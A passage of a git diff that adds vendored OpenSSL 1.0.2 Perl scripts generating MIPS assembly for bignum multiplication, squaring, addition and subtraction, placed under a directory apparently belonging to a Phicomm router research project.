+	$ADDU	$hi1,$nhi,$t0
+	mflo	$alo
+	mfhi	$ahi
+
+	$ADDU	$lo1,$lo0
+	sltu	$at,$lo1,$lo0
+	$MULTU	$nj,$m1
+	$ADDU	$hi1,$at
+	addu	$j,$BNSZ
+	$ST	$lo1,($tp)
+	sltu	$t0,$j,$num
+	mflo	$nlo
+	mfhi	$nhi
+
+	bnez	$t0,.L1st
+	$PTR_ADD $tp,$BNSZ
+	.set	reorder
+
+	$ADDU	$lo0,$alo,$hi0
+	sltu	$at,$lo0,$hi0
+	$ADDU	$hi0,$ahi,$at
+
+	$ADDU	$lo1,$nlo,$hi1
+	sltu	$t0,$lo1,$hi1
+	$ADDU	$hi1,$nhi,$t0
+	$ADDU	$lo1,$lo0
+	sltu	$at,$lo1,$lo0
+	$ADDU	$hi1,$at
+
+	$ST	$lo1,($tp)
+
+	$ADDU	$hi1,$hi0
+	sltu	$at,$hi1,$hi0
+	$ST	$hi1,$BNSZ($tp)
+	$ST	$at,2*$BNSZ($tp)
+
+	li	$i,$BNSZ
+.align	4
+.Louter:
+	$PTR_ADD $bi,$bp,$i
+	$LD	$bi,($bi)
+	$LD	$aj,($ap)
+	$LD	$alo,$BNSZ($ap)
+	$LD	$tj,($sp)
+
+	$MULTU	$aj,$bi
+	$LD	$nj,($np)
+	$LD	$nlo,$BNSZ($np)
+	mflo	$lo0
+	mfhi	$hi0
+	$ADDU	$lo0,$tj
+	$MULTU	$lo0,$n0
+	sltu	$at,$lo0,$tj
+	$ADDU	$hi0,$at
+	mflo	$m1
+
+	$MULTU	$alo,$bi
+	mflo	$alo
+	mfhi	$ahi
+
+	$MULTU	$nj,$m1
+	mflo	$lo1
+	mfhi	$hi1
+
+	$MULTU	$nlo,$m1
+	$ADDU	$lo1,$lo0
+	sltu	$at,$lo1,$lo0
+	$ADDU	$hi1,$at
+	mflo	$nlo
+	mfhi	$nhi
+
+	move	$tp,$sp
+	li	$j,2*$BNSZ
+	$LD	$tj,$BNSZ($tp)
+.align	4
+.Linner:
+	.set	noreorder
+	$PTR_ADD $aj,$ap,$j
+	$PTR_ADD $nj,$np,$j
+	$LD	$aj,($aj)
+	$LD	$nj,($nj)
+
+	$MULTU	$aj,$bi
+	$ADDU	$lo0,$alo,$hi0
+	$ADDU	$lo1,$nlo,$hi1
+	sltu	$at,$lo0,$hi0
+	sltu	$t0,$lo1,$hi1
+	$ADDU	$hi0,$ahi,$at
+	$ADDU	$hi1,$nhi,$t0
+	mflo	$alo
+	mfhi	$ahi
+
+	$ADDU	$lo0,$tj
+	addu	$j,$BNSZ
+	$MULTU	$nj,$m1
+	sltu	$at,$lo0,$tj
+	$ADDU	$lo1,$lo0
+	$ADDU	$hi0,$at
+	sltu	$t0,$lo1,$lo0
+	$LD	$tj,2*$BNSZ($tp)
+	$ADDU	$hi1,$t0
+	sltu	$at,$j,$num
+	mflo	$nlo
+	mfhi	$nhi
+	$ST	$lo1,($tp)
+	bnez	$at,.Linner
+	$PTR_ADD $tp,$BNSZ
+	.set	reorder
+
+	$ADDU	$lo0,$alo,$hi0
+	sltu	$at,$lo0,$hi0
+	$ADDU	$hi0,$ahi,$at
+	$ADDU	$lo0,$tj
+	sltu	$t0,$lo0,$tj
+	$ADDU	$hi0,$t0
+
+	$LD	$tj,2*$BNSZ($tp)
+	$ADDU	$lo1,$nlo,$hi1
+	sltu	$at,$lo1,$hi1
+	$ADDU	$hi1,$nhi,$at
+	$ADDU	$lo1,$lo0
+	sltu	$t0,$lo1,$lo0
+	$ADDU	$hi1,$t0
+	$ST	$lo1,($tp)
+
+	$ADDU	$lo1,$hi1,$hi0
+	sltu	$hi1,$lo1,$hi0
+	$ADDU	$lo1,$tj
+	sltu	$at,$lo1,$tj
+	$ADDU	$hi1,$at
+	$ST	$lo1,$BNSZ($tp)
+	$ST	$hi1,2*$BNSZ($tp)
+
+	addu	$i,$BNSZ
+	sltu	$t0,$i,$num
+	bnez	$t0,.Louter
+
+	.set	noreorder
+	$PTR_ADD $tj,$sp,$num	# &tp[num]
+	move	$tp,$sp
+	move	$ap,$sp
+	li	$hi0,0		# clear borrow bit
+
+.align	4
+.Lsub:	$LD	$lo0,($tp)
+	$LD	$lo1,($np)
+	$PTR_ADD $tp,$BNSZ
+	$PTR_ADD $np,$BNSZ
+	$SUBU	$lo1,$lo0,$lo1	# tp[i]-np[i]
+	sgtu	$at,$lo1,$lo0
+	$SUBU	$lo0,$lo1,$hi0
+	sgtu	$hi0,$lo0,$lo1
+	$ST	$lo0,($rp)
+	or	$hi0,$at
+	sltu	$at,$tp,$tj
+	bnez	$at,.Lsub
+	$PTR_ADD $rp,$BNSZ
+
+	$SUBU	$hi0,$hi1,$hi0	# handle upmost overflow bit
+	move	$tp,$sp
+	$PTR_SUB $rp,$num	# restore rp
+	not	$hi1,$hi0
+
+	and	$ap,$hi0,$sp
+	and	$bp,$hi1,$rp
+	or	$ap,$ap,$bp	# ap=borrow?tp:rp
+
+.align	4
+.Lcopy:	$LD	$aj,($ap)
+	$PTR_ADD $ap,$BNSZ
+	$ST	$zero,($tp)
+	$PTR_ADD $tp,$BNSZ
+	sltu	$at,$tp,$tj
+	$ST	$aj,($rp)
+	bnez	$at,.Lcopy
+	$PTR_ADD $rp,$BNSZ
+
+	li	$a0,1
+	li	$t0,1
+
+	.set	noreorder
+	move	$sp,$fp
+	$REG_L	$fp,($FRAMESIZE-1)*$SZREG($sp)
+	$REG_L	$s11,($FRAMESIZE-2)*$SZREG($sp)
+	$REG_L	$s10,($FRAMESIZE-3)*$SZREG($sp)
+	$REG_L	$s9,($FRAMESIZE-4)*$SZREG($sp)
+	$REG_L	$s8,($FRAMESIZE-5)*$SZREG($sp)
+	$REG_L	$s7,($FRAMESIZE-6)*$SZREG($sp)
+	$REG_L	$s6,($FRAMESIZE-7)*$SZREG($sp)
+	$REG_L	$s5,($FRAMESIZE-8)*$SZREG($sp)
+	$REG_L	$s4,($FRAMESIZE-9)*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$s3,($FRAMESIZE-10)*$SZREG($sp)
+	$REG_L	$s2,($FRAMESIZE-11)*$SZREG($sp)
+	$REG_L	$s1,($FRAMESIZE-12)*$SZREG($sp)
+	$REG_L	$s0,($FRAMESIZE-13)*$SZREG($sp)
+___
+$code.=<<___;
+	jr	$ra
+	$PTR_ADD $sp,$FRAMESIZE*$SZREG
+.end	bn_mul_mont_internal
+.rdata
+.asciiz	"Montgomery Multiplication for MIPS, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips.pl
new file mode 100644
index 0000000..acafde5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips.pl
@@ -0,0 +1,2234 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project.
+#
+# Rights for redistribution and usage in source and binary forms are
+# granted according to the OpenSSL license. Warranty of any kind is
+# disclaimed.
+# ====================================================================
+
+
+# July 1999
+#
+# This is drop-in MIPS III/IV ISA replacement for crypto/bn/bn_asm.c.
+#
+# The module is designed to work with either of the "new" MIPS ABI(5),
+# namely N32 or N64, offered by IRIX 6.x. It's not ment to work under
+# IRIX 5.x not only because it doesn't support new ABIs but also
+# because 5.x kernels put R4x00 CPU into 32-bit mode and all those
+# 64-bit instructions (daddu, dmultu, etc.) found below gonna only
+# cause illegal instruction exception:-(
+#
+# In addition the code depends on preprocessor flags set up by MIPSpro
+# compiler driver (either as or cc) and therefore (probably?) can't be
+# compiled by the GNU assembler. GNU C driver manages fine though...
+# I mean as long as -mmips-as is specified or is the default option,
+# because then it simply invokes /usr/bin/as which in turn takes
+# perfect care of the preprocessor definitions. Another neat feature
+# offered by the MIPSpro assembler is an optimization pass. This gave
+# me the opportunity to have the code looking more regular as all those
+# architecture dependent instruction rescheduling details were left to
+# the assembler. Cool, huh?
+#
+# Performance improvement is astonishing! 'apps/openssl speed rsa dsa'
+# goes way over 3 times faster!
+#
+#					<appro@fy.chalmers.se>
+
+# October 2010
+#
+# Adapt the module even for 32-bit ABIs and other OSes. The former was
+# achieved by mechanical replacement of 64-bit arithmetic instructions
+# such as dmultu, daddu, etc. with their 32-bit counterparts and
+# adjusting offsets denoting multiples of BN_ULONG. Above mentioned
+# >3x performance improvement naturally does not apply to 32-bit code
+# [because there is no instruction 32-bit compiler can't use], one
+# has to content with 40-85% improvement depending on benchmark and
+# key length, more for longer keys.
+
+$flavour = shift || "o32";
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+if ($flavour =~ /64|n32/i) {
+	$LD="ld";
+	$ST="sd";
+	$MULTU="dmultu";
+	$DIVU="ddivu";
+	$ADDU="daddu";
+	$SUBU="dsubu";
+	$SRL="dsrl";
+	$SLL="dsll";
+	$BNSZ=8;
+	$PTR_ADD="daddu";
+	$PTR_SUB="dsubu";
+	$SZREG=8;
+	$REG_S="sd";
+	$REG_L="ld";
+} else {
+	$LD="lw";
+	$ST="sw";
+	$MULTU="multu";
+	$DIVU="divu";
+	$ADDU="addu";
+	$SUBU="subu";
+	$SRL="srl";
+	$SLL="sll";
+	$BNSZ=4;
+	$PTR_ADD="addu";
+	$PTR_SUB="subu";
+	$SZREG=4;
+	$REG_S="sw";
+	$REG_L="lw";
+	$code=".set	mips2\n";
+}
+
+# Below is N32/64 register layout used in the original module.
+#
+($zero,$at,$v0,$v1)=map("\$$_",(0..3));
+($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+($t0,$t1,$t2,$t3,$t8,$t9)=map("\$$_",(12..15,24,25));
+($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7)=map("\$$_",(16..23));
+($gp,$sp,$fp,$ra)=map("\$$_",(28..31));
+($ta0,$ta1,$ta2,$ta3)=($a4,$a5,$a6,$a7);
+#
+# No special adaptation is required for O32. NUBI on the other hand
+# is treated by saving/restoring ($v1,$t0..$t3).
+
+$gp=$v1 if ($flavour =~ /nubi/i);
+
+$minus4=$v1;
+
+$code.=<<___;
+.rdata
+.asciiz	"mips3.s, Version 1.2"
+.asciiz	"MIPS II/III/IV ISA artwork by Andy Polyakov <appro\@fy.chalmers.se>"
+
+.text
+.set	noat
+
+.align	5
+.globl	bn_mul_add_words
+.ent	bn_mul_add_words
+bn_mul_add_words:
+	.set	noreorder
+	bgtz	$a2,bn_mul_add_words_internal
+	move	$v0,$zero
+	jr	$ra
+	move	$a0,$v0
+.end	bn_mul_add_words
+
+.align	5
+.ent	bn_mul_add_words_internal
+bn_mul_add_words_internal:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	li	$minus4,-4
+	and	$ta0,$a2,$minus4
+	beqz	$ta0,.L_bn_mul_add_words_tail
+
+.L_bn_mul_add_words_loop:
+	$LD	$t0,0($a1)
+	$MULTU	$t0,$a3
+	$LD	$t1,0($a0)
+	$LD	$t2,$BNSZ($a1)
+	$LD	$t3,$BNSZ($a0)
+	$LD	$ta0,2*$BNSZ($a1)
+	$LD	$ta1,2*$BNSZ($a0)
+	$ADDU	$t1,$v0
+	sltu	$v0,$t1,$v0	# All manuals say it "compares 32-bit
+				# values", but it seems to work fine
+				# even on 64-bit registers.
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$t1,$at
+	$ADDU	$v0,$t0
+	 $MULTU	$t2,$a3
+	sltu	$at,$t1,$at
+	$ST	$t1,0($a0)
+	$ADDU	$v0,$at
+
+	$LD	$ta2,3*$BNSZ($a1)
+	$LD	$ta3,3*$BNSZ($a0)
+	$ADDU	$t3,$v0
+	sltu	$v0,$t3,$v0
+	mflo	$at
+	mfhi	$t2
+	$ADDU	$t3,$at
+	$ADDU	$v0,$t2
+	 $MULTU	$ta0,$a3
+	sltu	$at,$t3,$at
+	$ST	$t3,$BNSZ($a0)
+	$ADDU	$v0,$at
+
+	subu	$a2,4
+	$PTR_ADD $a0,4*$BNSZ
+	$PTR_ADD $a1,4*$BNSZ
+	$ADDU	$ta1,$v0
+	sltu	$v0,$ta1,$v0
+	mflo	$at
+	mfhi	$ta0
+	$ADDU	$ta1,$at
+	$ADDU	$v0,$ta0
+	 $MULTU	$ta2,$a3
+	sltu	$at,$ta1,$at
+	$ST	$ta1,-2*$BNSZ($a0)
+	$ADDU	$v0,$at
+
+
+	and	$ta0,$a2,$minus4
+	$ADDU	$ta3,$v0
+	sltu	$v0,$ta3,$v0
+	mflo	$at
+	mfhi	$ta2
+	$ADDU	$ta3,$at
+	$ADDU	$v0,$ta2
+	sltu	$at,$ta3,$at
+	$ST	$ta3,-$BNSZ($a0)
+	.set	noreorder
+	bgtz	$ta0,.L_bn_mul_add_words_loop
+	$ADDU	$v0,$at
+
+	beqz	$a2,.L_bn_mul_add_words_return
+	nop
+
+.L_bn_mul_add_words_tail:
+	.set	reorder
+	$LD	$t0,0($a1)
+	$MULTU	$t0,$a3
+	$LD	$t1,0($a0)
+	subu	$a2,1
+	$ADDU	$t1,$v0
+	sltu	$v0,$t1,$v0
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$t1,$at
+	$ADDU	$v0,$t0
+	sltu	$at,$t1,$at
+	$ST	$t1,0($a0)
+	$ADDU	$v0,$at
+	beqz	$a2,.L_bn_mul_add_words_return
+
+	$LD	$t0,$BNSZ($a1)
+	$MULTU	$t0,$a3
+	$LD	$t1,$BNSZ($a0)
+	subu	$a2,1
+	$ADDU	$t1,$v0
+	sltu	$v0,$t1,$v0
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$t1,$at
+	$ADDU	$v0,$t0
+	sltu	$at,$t1,$at
+	$ST	$t1,$BNSZ($a0)
+	$ADDU	$v0,$at
+	beqz	$a2,.L_bn_mul_add_words_return
+
+	$LD	$t0,2*$BNSZ($a1)
+	$MULTU	$t0,$a3
+	$LD	$t1,2*$BNSZ($a0)
+	$ADDU	$t1,$v0
+	sltu	$v0,$t1,$v0
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$t1,$at
+	$ADDU	$v0,$t0
+	sltu	$at,$t1,$at
+	$ST	$t1,2*$BNSZ($a0)
+	$ADDU	$v0,$at
+
+.L_bn_mul_add_words_return:
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	move	$a0,$v0
+.end	bn_mul_add_words_internal
+
+.align	5
+.globl	bn_mul_words
+.ent	bn_mul_words
+bn_mul_words:
+	.set	noreorder
+	bgtz	$a2,bn_mul_words_internal
+	move	$v0,$zero
+	jr	$ra
+	move	$a0,$v0
+.end	bn_mul_words
+
+.align	5
+.ent	bn_mul_words_internal
+bn_mul_words_internal:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	li	$minus4,-4
+	and	$ta0,$a2,$minus4
+	beqz	$ta0,.L_bn_mul_words_tail
+
+.L_bn_mul_words_loop:
+	$LD	$t0,0($a1)
+	$MULTU	$t0,$a3
+	$LD	$t2,$BNSZ($a1)
+	$LD	$ta0,2*$BNSZ($a1)
+	$LD	$ta2,3*$BNSZ($a1)
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$v0,$at
+	sltu	$t1,$v0,$at
+	 $MULTU	$t2,$a3
+	$ST	$v0,0($a0)
+	$ADDU	$v0,$t1,$t0
+
+	subu	$a2,4
+	$PTR_ADD $a0,4*$BNSZ
+	$PTR_ADD $a1,4*$BNSZ
+	mflo	$at
+	mfhi	$t2
+	$ADDU	$v0,$at
+	sltu	$t3,$v0,$at
+	 $MULTU	$ta0,$a3
+	$ST	$v0,-3*$BNSZ($a0)
+	$ADDU	$v0,$t3,$t2
+
+	mflo	$at
+	mfhi	$ta0
+	$ADDU	$v0,$at
+	sltu	$ta1,$v0,$at
+	 $MULTU	$ta2,$a3
+	$ST	$v0,-2*$BNSZ($a0)
+	$ADDU	$v0,$ta1,$ta0
+
+	and	$ta0,$a2,$minus4
+	mflo	$at
+	mfhi	$ta2
+	$ADDU	$v0,$at
+	sltu	$ta3,$v0,$at
+	$ST	$v0,-$BNSZ($a0)
+	.set	noreorder
+	bgtz	$ta0,.L_bn_mul_words_loop
+	$ADDU	$v0,$ta3,$ta2
+
+	beqz	$a2,.L_bn_mul_words_return
+	nop
+
+.L_bn_mul_words_tail:
+	.set	reorder
+	$LD	$t0,0($a1)
+	$MULTU	$t0,$a3
+	subu	$a2,1
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$v0,$at
+	sltu	$t1,$v0,$at
+	$ST	$v0,0($a0)
+	$ADDU	$v0,$t1,$t0
+	beqz	$a2,.L_bn_mul_words_return
+
+	$LD	$t0,$BNSZ($a1)
+	$MULTU	$t0,$a3
+	subu	$a2,1
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$v0,$at
+	sltu	$t1,$v0,$at
+	$ST	$v0,$BNSZ($a0)
+	$ADDU	$v0,$t1,$t0
+	beqz	$a2,.L_bn_mul_words_return
+
+	$LD	$t0,2*$BNSZ($a1)
+	$MULTU	$t0,$a3
+	mflo	$at
+	mfhi	$t0
+	$ADDU	$v0,$at
+	sltu	$t1,$v0,$at
+	$ST	$v0,2*$BNSZ($a0)
+	$ADDU	$v0,$t1,$t0
+
+.L_bn_mul_words_return:
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	move	$a0,$v0
+.end	bn_mul_words_internal
+
+.align	5
+.globl	bn_sqr_words
+.ent	bn_sqr_words
+bn_sqr_words:
+	.set	noreorder
+	bgtz	$a2,bn_sqr_words_internal
+	move	$v0,$zero
+	jr	$ra
+	move	$a0,$v0
+.end	bn_sqr_words
+
+.align	5
+.ent	bn_sqr_words_internal
+bn_sqr_words_internal:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	li	$minus4,-4
+	and	$ta0,$a2,$minus4
+	beqz	$ta0,.L_bn_sqr_words_tail
+
+.L_bn_sqr_words_loop:
+	$LD	$t0,0($a1)
+	$MULTU	$t0,$t0
+	$LD	$t2,$BNSZ($a1)
+	$LD	$ta0,2*$BNSZ($a1)
+	$LD	$ta2,3*$BNSZ($a1)
+	mflo	$t1
+	mfhi	$t0
+	$ST	$t1,0($a0)
+	$ST	$t0,$BNSZ($a0)
+
+	$MULTU	$t2,$t2
+	subu	$a2,4
+	$PTR_ADD $a0,8*$BNSZ
+	$PTR_ADD $a1,4*$BNSZ
+	mflo	$t3
+	mfhi	$t2
+	$ST	$t3,-6*$BNSZ($a0)
+	$ST	$t2,-5*$BNSZ($a0)
+
+	$MULTU	$ta0,$ta0
+	mflo	$ta1
+	mfhi	$ta0
+	$ST	$ta1,-4*$BNSZ($a0)
+	$ST	$ta0,-3*$BNSZ($a0)
+
+
+	$MULTU	$ta2,$ta2
+	and	$ta0,$a2,$minus4
+	mflo	$ta3
+	mfhi	$ta2
+	$ST	$ta3,-2*$BNSZ($a0)
+
+	.set	noreorder
+	bgtz	$ta0,.L_bn_sqr_words_loop
+	$ST	$ta2,-$BNSZ($a0)
+
+	beqz	$a2,.L_bn_sqr_words_return
+	nop
+
+.L_bn_sqr_words_tail:
+	.set	reorder
+	$LD	$t0,0($a1)
+	$MULTU	$t0,$t0
+	subu	$a2,1
+	mflo	$t1
+	mfhi	$t0
+	$ST	$t1,0($a0)
+	$ST	$t0,$BNSZ($a0)
+	beqz	$a2,.L_bn_sqr_words_return
+
+	$LD	$t0,$BNSZ($a1)
+	$MULTU	$t0,$t0
+	subu	$a2,1
+	mflo	$t1
+	mfhi	$t0
+	$ST	$t1,2*$BNSZ($a0)
+	$ST	$t0,3*$BNSZ($a0)
+	beqz	$a2,.L_bn_sqr_words_return
+
+	$LD	$t0,2*$BNSZ($a1)
+	$MULTU	$t0,$t0
+	mflo	$t1
+	mfhi	$t0
+	$ST	$t1,4*$BNSZ($a0)
+	$ST	$t0,5*$BNSZ($a0)
+
+.L_bn_sqr_words_return:
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	move	$a0,$v0
+
+.end	bn_sqr_words_internal
+
+.align	5
+.globl	bn_add_words
+.ent	bn_add_words
+bn_add_words:
+	.set	noreorder
+	bgtz	$a3,bn_add_words_internal
+	move	$v0,$zero
+	jr	$ra
+	move	$a0,$v0
+.end	bn_add_words
+
+.align	5
+.ent	bn_add_words_internal
+bn_add_words_internal:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	li	$minus4,-4
+	and	$at,$a3,$minus4
+	beqz	$at,.L_bn_add_words_tail
+
+.L_bn_add_words_loop:
+	$LD	$t0,0($a1)
+	$LD	$ta0,0($a2)
+	subu	$a3,4
+	$LD	$t1,$BNSZ($a1)
+	and	$at,$a3,$minus4
+	$LD	$t2,2*$BNSZ($a1)
+	$PTR_ADD $a2,4*$BNSZ
+	$LD	$t3,3*$BNSZ($a1)
+	$PTR_ADD $a0,4*$BNSZ
+	$LD	$ta1,-3*$BNSZ($a2)
+	$PTR_ADD $a1,4*$BNSZ
+	$LD	$ta2,-2*$BNSZ($a2)
+	$LD	$ta3,-$BNSZ($a2)
+	$ADDU	$ta0,$t0
+	sltu	$t8,$ta0,$t0
+	$ADDU	$t0,$ta0,$v0
+	sltu	$v0,$t0,$ta0
+	$ST	$t0,-4*$BNSZ($a0)
+	$ADDU	$v0,$t8
+
+	$ADDU	$ta1,$t1
+	sltu	$t9,$ta1,$t1
+	$ADDU	$t1,$ta1,$v0
+	sltu	$v0,$t1,$ta1
+	$ST	$t1,-3*$BNSZ($a0)
+	$ADDU	$v0,$t9
+
+	$ADDU	$ta2,$t2
+	sltu	$t8,$ta2,$t2
+	$ADDU	$t2,$ta2,$v0
+	sltu	$v0,$t2,$ta2
+	$ST	$t2,-2*$BNSZ($a0)
+	$ADDU	$v0,$t8
+	
+	$ADDU	$ta3,$t3
+	sltu	$t9,$ta3,$t3
+	$ADDU	$t3,$ta3,$v0
+	sltu	$v0,$t3,$ta3
+	$ST	$t3,-$BNSZ($a0)
+	
+	.set	noreorder
+	bgtz	$at,.L_bn_add_words_loop
+	$ADDU	$v0,$t9
+
+	beqz	$a3,.L_bn_add_words_return
+	nop
+
+.L_bn_add_words_tail:
+	.set	reorder
+	$LD	$t0,0($a1)
+	$LD	$ta0,0($a2)
+	$ADDU	$ta0,$t0
+	subu	$a3,1
+	sltu	$t8,$ta0,$t0
+	$ADDU	$t0,$ta0,$v0
+	sltu	$v0,$t0,$ta0
+	$ST	$t0,0($a0)
+	$ADDU	$v0,$t8
+	beqz	$a3,.L_bn_add_words_return
+
+	$LD	$t1,$BNSZ($a1)
+	$LD	$ta1,$BNSZ($a2)
+	$ADDU	$ta1,$t1
+	subu	$a3,1
+	sltu	$t9,$ta1,$t1
+	$ADDU	$t1,$ta1,$v0
+	sltu	$v0,$t1,$ta1
+	$ST	$t1,$BNSZ($a0)
+	$ADDU	$v0,$t9
+	beqz	$a3,.L_bn_add_words_return
+
+	$LD	$t2,2*$BNSZ($a1)
+	$LD	$ta2,2*$BNSZ($a2)
+	$ADDU	$ta2,$t2
+	sltu	$t8,$ta2,$t2
+	$ADDU	$t2,$ta2,$v0
+	sltu	$v0,$t2,$ta2
+	$ST	$t2,2*$BNSZ($a0)
+	$ADDU	$v0,$t8
+
+.L_bn_add_words_return:
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	move	$a0,$v0
+
+.end	bn_add_words_internal
+
+.align	5
+.globl	bn_sub_words
+.ent	bn_sub_words
+bn_sub_words:
+	.set	noreorder
+	bgtz	$a3,bn_sub_words_internal
+	move	$v0,$zero
+	jr	$ra
+	move	$a0,$zero
+.end	bn_sub_words
+
+.align	5
+.ent	bn_sub_words_internal
+bn_sub_words_internal:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	li	$minus4,-4
+	and	$at,$a3,$minus4
+	beqz	$at,.L_bn_sub_words_tail
+
+.L_bn_sub_words_loop:
+	$LD	$t0,0($a1)
+	$LD	$ta0,0($a2)
+	subu	$a3,4
+	$LD	$t1,$BNSZ($a1)
+	and	$at,$a3,$minus4
+	$LD	$t2,2*$BNSZ($a1)
+	$PTR_ADD $a2,4*$BNSZ
+	$LD	$t3,3*$BNSZ($a1)
+	$PTR_ADD $a0,4*$BNSZ
+	$LD	$ta1,-3*$BNSZ($a2)
+	$PTR_ADD $a1,4*$BNSZ
+	$LD	$ta2,-2*$BNSZ($a2)
+	$LD	$ta3,-$BNSZ($a2)
+	sltu	$t8,$t0,$ta0
+	$SUBU	$ta0,$t0,$ta0
+	$SUBU	$t0,$ta0,$v0
+	sgtu	$v0,$t0,$ta0
+	$ST	$t0,-4*$BNSZ($a0)
+	$ADDU	$v0,$t8
+
+	sltu	$t9,$t1,$ta1
+	$SUBU	$ta1,$t1,$ta1
+	$SUBU	$t1,$ta1,$v0
+	sgtu	$v0,$t1,$ta1
+	$ST	$t1,-3*$BNSZ($a0)
+	$ADDU	$v0,$t9
+
+
+	sltu	$t8,$t2,$ta2
+	$SUBU	$ta2,$t2,$ta2
+	$SUBU	$t2,$ta2,$v0
+	sgtu	$v0,$t2,$ta2
+	$ST	$t2,-2*$BNSZ($a0)
+	$ADDU	$v0,$t8
+
+	sltu	$t9,$t3,$ta3
+	$SUBU	$ta3,$t3,$ta3
+	$SUBU	$t3,$ta3,$v0
+	sgtu	$v0,$t3,$ta3
+	$ST	$t3,-$BNSZ($a0)
+
+	.set	noreorder
+	bgtz	$at,.L_bn_sub_words_loop
+	$ADDU	$v0,$t9
+
+	beqz	$a3,.L_bn_sub_words_return
+	nop
+
+.L_bn_sub_words_tail:
+	.set	reorder
+	$LD	$t0,0($a1)
+	$LD	$ta0,0($a2)
+	subu	$a3,1
+	sltu	$t8,$t0,$ta0
+	$SUBU	$ta0,$t0,$ta0
